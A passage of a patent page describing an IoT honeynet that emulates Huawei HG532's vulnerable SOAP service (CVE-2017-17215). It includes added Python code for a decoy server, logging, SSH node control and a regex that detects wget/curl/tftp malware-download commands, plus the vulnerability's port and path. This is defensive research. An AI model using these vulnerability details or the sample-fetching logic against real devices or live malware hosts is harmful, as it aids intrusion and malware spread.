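    """Copy a file (image tarball, configuration, ...) to a node over SFTP."""
    client = _ssh_client(host, username, timeout)
    try:
        sftp = client.open_sftp()
        sftp.put(local_path, remote_path)
        sftp.close()
        return 0, "put %s -> %s:%s" % (local_path, host, remote_path), ""
    finally:
        client.close()


def dispatch(hosts, args, transport=ssh_exec, workers=8):
    """Apply transport(host, *args) to every host from a pool of threads.

    Returns {host: {"rc", "out", "err"}}; a transport failure (auth, timeout,
    unreachable node) is recorded with rc -1 so one bad node never stalls the sweep.
    """
    pending = Queue()
    for host in hosts:
        pending.put(host)
    results, lock = {}, threading.Lock()

    def worker():
        while True:
            try:
                host = pending.get_nowait()
            except Empty:
                return
            try:
                rc, out, err = transport(host, *args)
            except Exception as exc:
                rc, out, err = -1, "", repr(exc)
            with lock:
                results[host] = {"rc": rc, "out": out, "err": err}

    threads = [threading.Thread(target=worker, daemon=True)
               for _ in range(min(workers, len(hosts)))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def write_output_log(results, path):
    """Append one json line per node to the output log; returns the number written."""
    with open(path, "a", encoding="utf-8") as fh:
        for host in sorted(results):
            fh.write(json.dumps({"ts": time.time(), "host": host, **results[host]}) + "\n")
    return len(results)


def fake_transport(host, command):
    """Constructed stand-in for ssh_exec so the dispatcher can be exercised offline."""
    if host.endswith(".9"):
        raise ConnectionError("no route to host")
    return 0, "%s: %s" % (host, command), ""


if __name__ == "__main__":
    res = dispatch(["10.0.0.1", "10.0.0.9"], (HONEYPOT_COMMANDS["status"],), fake_transport)
    print(json.dumps(res, indent=1))
```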
The technical effects of the invention are as follows:
By simulating SOAP services and using real firmware, this small-scale IoT honeynet can monitor SOAP injection attacks, record logs and download malicious samples automatically. The test environment is as follows:
TABLE 5 test environment
Figure GDA0003426196580000131
Honeypot functional tests are shown in table 6. The functional tests show that the IoT honeypot can perfectly simulate real IoT device services, handle unknown requests, and also self-check and restart; it therefore has a degree of fault tolerance and robustness and provides a reliable base environment for the system.
TABLE 6 honeypot test case
Figure GDA0003426196580000132
TABLE 6 (continued)
Figure GDA0003426196580000133
Figure GDA0003426196580000141
Honeypots deployed in the USA and Canada ran steadily for one week and collected a large amount of attack data, as shown in table 7.
TABLE 7 sample server information
Figure GDA0003426196580000142
A total of 332 different IPs were observed scanning and injecting into the honeypots. 9 IPs found in the records are suspected sample download centers or C2 servers, from different countries; in addition to these IPs the honeypots captured a threat domain name cnc.
The honeypot parses the malicious request to obtain the address of the sample server and downloads several IoT malicious samples from those servers; the samples were not yet recorded on VT (VirusTotal) at capture time, so the honeypot can capture the latest IoT threats and has high research and engineering value.
The specific malicious sample information is shown in table 8:
TABLE 8 IoT malicious samples captured by the honeypot
Figure GDA0003426196580000143

Claims (5)

1. An IoT honeynet system based on SOAP service simulation, characterized by comprising three types of honeypot: a simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability, a real SOAP service honeypot built from device firmware carrying the CVE-2017-17215 vulnerability, and a multi-port simulated SOAP service honeypot;
after each honeypot is packaged with Docker, the honeynet deploys the honeypots to several physical nodes, with 1 to 3 honeypots of different types on each node; each node supports single- and multi-honeypot deployment, and each node also carries a main control program for managing the honeypots on that node;
the control node manages and interacts with each physical node, so that independent honeypots are combined into one honeynet system;
because the simulation details of the simulated SOAP service honeypot are limited, when it receives a SOAP service request it cannot parse and handle, the request is forwarded to the real SOAP service honeypot built from device firmware carrying the CVE-2017-17215 vulnerability for processing;
a script on the control node distributes and transmits files and commands, obtains the honeypots' response messages and records them in an output log; the control script uses python multithreading and the paramiko library to connect to the remote hosts in an ip list; the script transfers files, and connects to hosts with ssh keys to execute given commands, so as to start and stop honeypots and monitor the host system;
the CVE-2017-17215 vulnerability: HG532 series routers provide an insecure SOAP service for device upgrades, allowing unauthorized access and remote code injection; using this vulnerability, a specially constructed request packet is sent to port 37215, on which the router's UPnP service listens, after which arbitrary commands can be executed remotely;
the CVE-2017-17215 vulnerability information is as follows:
the port used by the vulnerability is: 37215
the request path of the vulnerability is: /ctrlt/DeviceUpgrade_1
affected device models include: b660, HG231f, HG531sV1, HG531V1, HG630, YAbox;
the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability comprises four main modules: the honeypot core module, the honeypot daemon class, the honeypot daemon service and the honeypot monitor;
the honeypot core module, pot_core, is the core service program of the honeypot, providing the simulated vulnerable IoT service, and comprises: the soap service module soap_server, the web service module webhook, the log module log_server and the malicious sample processing module samples_deal;
the soap service module soap_server provides the external interface function start_honeypot to the honeypot daemon class, the honeypot daemon service and the honeypot monitor; the function starts the log server and the soap server for listening, and sets a timer that calls the timer_handle_log_fun function of the log module log_server; soap_server calls the handler defined in the web service module webhook and the make_server function of the wsgiref.simple_server library, and opens a soap server on port 37215 to simulate the vulnerable SOAP service of a real IoT device, so as to attract hackers' attacks;
the log module log_server defines a UDPHandler that listens for request information sent by the soap service module soap_server in json format, parses it and returns a message that the log was recorded successfully; if the request is found to download a malicious sample, the wget_virus_in_url function of the malicious sample processing module samples_deal is called to download the sample; the log types in log_server are get, post and other, and the log format is shown in the following table:
Figure FDA0003426196570000021
the web service module webhook defines a handler function for the soap vulnerability and returns a constructed fake file through wsgi; for the cve-2017-17215 vulnerability, the injected code accesses port 37215 of the web service with the path /ctrlt/DeviceUpgrade_1, and the banner information is shown in the cve-2017-17215 vulnerability banner format table; webhook also defines a send_log function, which sends the request record, packed in json format, to log_server; webhook communicates with the log server through a socket, waits for the returned message, retransmits if an error message is received, and considers the server down if the number of retransmissions exceeds the limit;
the cve-2017-17215 banner format is as follows:
Figure FDA0003426196570000022
Figure FDA0003426196570000031
the malicious sample processing module samples_deal is responsible for downloading and processing malicious samples; the wget_virus_in_url function provides the externally callable sample download interface; it extracts the download elements with a regular expression; once the download resource information is extracted, the download_virus_by_requests function is called to download the sample: it first looks up the output directory and sample name and, if the sample name already exists, calls the renaming_duplicate_virus function to rename the sample by adding a suffix; the function then downloads the sample with the requests library; if the download succeeds, the deep_analyze function is called for deep analysis, that is, the sample content is analysed line by line to judge whether it is a 'small horse pulling a big horse' case (a small dropper that fetches a larger payload); samples_deal also defines a clear_duplicate_sample function, which computes the sample's hash with the md5sum function to deduplicate samples;
these parts cooperate to form the honeypot core, completing the most basic functions of the honeypot and simulating real IoT devices and services;
the honeypot daemon class defines a honeypot daemon base class Daemon and provides an interface for controlling the honeypot through class instances; the daemonize function in the daemon class initializes a Daemon instance: it first checks the pidfile to judge whether a daemon is already running, then flushes the buffers, detaches the standard streams, and finally registers an atexit handler so that the pidfile is removed when the process ends; the static function __sigterm_handler raises a SystemExit exception; the start function calls daemonize to initialize, catches runtime exceptions and prints error information; the stop function reads the process number from the pidfile and terminates that process; the restart function calls stop and then start to complete the restart;
the honeypot daemon service defines a MyDaemon class inheriting from Daemon, whose run method calls the core_service.start_honeypot function to start the honeypot core service; in the main function a MyDaemon instance is created, and the honeypot daemon process and honeypot core are controlled through the instance's start, stop and restart functions; the code also defines a PotCore class, which provides the daemon's external interface and calls the main function through subprocess; the MyDaemon instance is not called directly: the PotCore instance is called, and it calls the MyDaemon instance through its own methods, an indirect call;
the honeypot monitor pot_monitor calls the timer_handle_web_detect_fun function to check the honeypot's functions; the function accesses the simulated honeypot service periodically, detects its running state, judges abnormalities such as timeouts and connection errors, and calls the PotCore object to restart when an abnormality occurs.
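The cooperation of webhook, log_server and samples_deal in claim 1, condensed into one stdlib-only program as an added example (not the patent's code): a WSGI handler answers /ctrlt/DeviceUpgrade_1 with a constructed decoy reply and sends a json record of every request to a UDP log server, send_log retransmits until it receives "ok", and extract_download_urls stands in for the regular expression of wget_virus_in_url. The decoy envelope, the regular expression and the sample request bodies are assumptions; the page's banner table is not reproduced.

```python
import json
import re
import socket
import socketserver
import threading
from wsgiref.simple_server import make_server

VULN_PATH = "/ctrlt/DeviceUpgrade_1"      # request path named on the page
# Constructed decoy reply standing in for the page's banner table.
DECOY_BODY = (b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
              b"<s:Body><UpgradeResponse/></s:Body></s:Envelope>")
# Download target of a wget/curl/tftp command embedded in a request body.
DL_RE = re.compile(r"(?:wget|curl|tftp)\b[^;&|<>]*?"
                   r"((?:(?:https?|tftp)://)?(?:[\w-]+\.)+[\w-]+(?::\d+)?/[^\s'\"`;&|<>]*)")


def extract_download_urls(text):
    """Distinct download targets referenced by shell download commands, in order."""
    urls = []
    for url in DL_RE.findall(text):
        if url not in urls:
            urls.append(url)
    return urls


def classify(method):
    """Log types used by log_server: get, post and other."""
    method = method.lower()
    return method if method in ("get", "post") else "other"


def send_log(record, addr, retries=3, timeout=1.0):
    """Send one json record; retransmit on error, False once the server looks down."""
    payload = json.dumps(record).encode()
    for _ in range(retries):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            try:
                sock.sendto(payload, addr)
                reply, _ = sock.recvfrom(64)
            except OSError:          # timeout or unreachable: try again
                continue
        if reply == b"ok":
            return True
    return False


class LogHandler(socketserver.BaseRequestHandler):
    """UDP handler: parse the json record, note any sample URLs in it, acknowledge."""

    def handle(self):
        data, sock = self.request
        try:
            record = json.loads(data.decode())
        except (UnicodeDecodeError, ValueError):
            sock.sendto(b"error", self.client_address)
            return
        record["sample_urls"] = extract_download_urls(record.get("body", ""))
        with self.server.lock:
            self.server.records.append(record)
        sock.sendto(b"ok", self.client_address)


def start_log_server():
    """Bind the UDP log server on a free local port and serve it from a background thread."""
    server = socketserver.UDPServer(("127.0.0.1", 0), LogHandler)
    server.records, server.lock = [], threading.Lock()
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def make_app(log_addr):
    """WSGI app: log every request, answer the vulnerable path with the decoy."""
    def app(environ, start_response):
        length = int(environ.get("CONTENT_LENGTH") or 0)
        body = environ["wsgi.input"].read(length).decode(errors="replace")
        record = {"type": classify(environ["REQUEST_METHOD"]), "path": environ["PATH_INFO"],
                  "remote": environ.get("REMOTE_ADDR", ""), "body": body}
        send_log(record, log_addr)            # a down log server must not break the decoy
        if environ["PATH_INFO"] == VULN_PATH:
            start_response("200 OK", [("Content-Type", "text/xml")])
            return [DECOY_BODY]
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]
    return app


if __name__ == "__main__":
    log_server = start_log_server()
    # The page's soap_server listens on 37215; bind the same port here.
    make_server("0.0.0.0", 37215, make_app(log_server.server_address)).serve_forever()
```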
2. The IoT honeynet system as claimed in claim 1, wherein the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability further comprises:
a json honeypot configuration file that defines the following parameters: honeypot name, log output directory, honeypot core, honeypot self-check delay and self-check period;
a sh script that calls the tc tool to limit traffic, so that a compromised honeypot cannot be used for DDoS attacks; and a py script, called main in this program, which is the outermost entry point of the honeypot.
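The self-check loop that claim 1 describes for pot_monitor, driven by the self-check delay and period of the configuration file in claim 2, written out as an added example (not the patent's code): check_service probes the simulated service once and classifies timeouts and connection errors, and Monitor reschedules itself with threading.Timer and calls a restart hook when a check fails. The configuration keys, the check URL and the docker-based restart hook are assumptions.

```python
import json
import socket
import subprocess
import threading
import urllib.error
import urllib.request

# Constructed configuration in the shape claim 2 describes; the key names are assumed.
DEFAULT_CONFIG = json.loads("""{
  "honeypot_name": "soap-cve-2017-17215",
  "log_dir": "/var/log/honeypot",
  "core": "pot_core",
  "self_check_delay": 30,
  "self_check_period": 60,
  "check_url": "http://127.0.0.1:37215/ctrlt/DeviceUpgrade_1"
}""")


def check_service(url, timeout=3.0):
    """Probe the simulated service once.

    Returns 'ok', 'bad status' (the server answers with an error code),
    'timeout' or 'connection error'.
    """
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return "ok" if resp.status < 400 else "bad status"
    except urllib.error.HTTPError:
        return "bad status"
    except urllib.error.URLError as exc:       # connect-phase failures arrive wrapped
        return "timeout" if isinstance(exc.reason, socket.timeout) else "connection error"
    except (socket.timeout, TimeoutError):     # a read-phase timeout surfaces unwrapped
        return "timeout"


class Monitor:
    """Periodic self-check driven by threading.Timer, as pot_monitor does."""

    def __init__(self, config, restart, probe=check_service):
        self.config, self.restart, self.probe = config, restart, probe
        self.history = []        # (state, restarted) for every check performed
        self._timer = None

    def run_once(self):
        """Check once; restart the honeypot when the service is abnormal. Returns the state."""
        state = self.probe(self.config["check_url"])
        restarted = state != "ok"
        if restarted:
            self.restart(self.config["honeypot_name"])
        self.history.append((state, restarted))
        return state

    def _tick(self):
        self.run_once()
        self._schedule(self.config["self_check_period"])

    def _schedule(self, delay):
        self._timer = threading.Timer(delay, self._tick)
        self._timer.daemon = True
        self._timer.start()

    def start(self):
        """First check after self_check_delay, then one every self_check_period seconds."""
        self._schedule(self.config["self_check_delay"])

    def stop(self):
        if self._timer:
            self._timer.cancel()


def restart_via_docker(name):
    """Hypothetical restart hook standing in for the PotCore restart call."""
    return subprocess.run(["docker", "restart", name], capture_output=True).returncode


if __name__ == "__main__":
    Monitor(DEFAULT_CONFIG, restart_via_docker).start()
    threading.Event().wait()     # keep the process alive for the timer thread
```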
3. The IoT honeynet system based on SOAP service simulation as claimed in claim 1, wherein the real SOAP service honeypot built from device firmware carrying the CVE-2017-17215 vulnerability is used as follows:
when a request cannot be handled by the simulated protocol, the attacker does not receive the expected response and is likely to break the connection, so the honeypot cannot capture the subsequent injected code and malicious samples; therefore a honeypot is built from the complete real firmware of the vulnerable IoT device to handle the requests that the simulated honeypot cannot handle;
the real SOAP service honeypot boots the kernel file vmlinux-2.6.32-5-4kc-malta and the disk image debian_squeeze_mips_standard.qcow2 in a qemu environment; after it starts successfully, the command chroot /root/squashfs-root /bin/sh switches the root directory and the upnp and mic services are run, so that the honeypot provides exactly the SOAP service of the real vulnerable IoT device; the real SOAP service honeypot includes the log module log_server and the malicious sample processing module samples_deal of the honeypot core module.
4. The IoT honeynet system based on SOAP service simulation as claimed in claim 3, wherein the multi-port simulated SOAP service honeypot is built according to the SOAP ports most exposed on IoT devices in 2018, and the SOAP port information is as follows:
Figure FDA0003426196570000041
Figure FDA0003426196570000051
the core module of the multi-port simulated SOAP service honeypot has the same function as that of the simulated SOAP service honeypot based on the CVE-2017-17215 vulnerability; the difference is that the multi-port simulated SOAP service honeypot is a multi-port honeypot, so multithreading is implemented with the threading module in the code.
5. The IoT honeynet system based on SOAP service simulation as claimed in claim 4, wherein the Docker encapsulation adopted by the honeynet system comprises the following operations:
1) optimizing the base image: ubuntu16.04 is used as the honeypot's base image, with a python3.6 environment and the dependency packages needed by the code integrated into it, so that image downloads do not slow down packaging;
2) chaining Dockerfile instructions: several commands are chained into one RUN instruction, reducing the number of image layers, and unnecessary components are deleted to save space;
3) optimizing the build: the image cache is fully used, builds are done on a fixed machine, and the large, rarely changing dependency library is kept separate from the frequently modified own code;
4) optimizing the RUN commands: when running apt, several packages are installed in one command, and the --no-install-recommends option avoids pulling in recommended dependencies.
CN201910680597.1A, priority date 2019-07-25, filing date 2019-07-25: An IoT Honeynet System Based on SOAP Service Simulation, Active, CN110391937B (en)

Publications (2)
CN110391937A (en), published 2019-10-29
CN110391937B (en), published 2022-03-04

Legal Events
PB01 Publication
SE01 Entry into force of request for substantive examination
CB03 Change of inventor or designer information
Inventors after: Zhang Weizhe, He Hui, Fang Binxing, Wang Huanran, Ding Zeyu
Inventors before: Zhang Weizhe, He Hui, Fang Binxing, Ding Zeyu
GR01 Patent grant